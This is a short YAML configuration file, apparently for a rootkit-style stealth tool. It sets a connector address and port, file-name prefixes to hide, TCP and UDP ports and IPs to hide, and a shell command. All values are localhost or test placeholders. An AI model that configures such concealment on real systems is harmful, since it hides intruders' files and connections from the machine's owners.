hideme: false
connector:
    ip: "127.0.0.1"
    port: "1337"
hide_dent:
    - "91746"
    - "1337test_"
hide_tcp_port:
    - "8080"
hide_tcp_ip:
    - "127.0.0.1"
hide_udp_port:
    - "8080"
hide_udp_ip:
    - "127.0.0.1"
shell:
    - "sleep 1000"
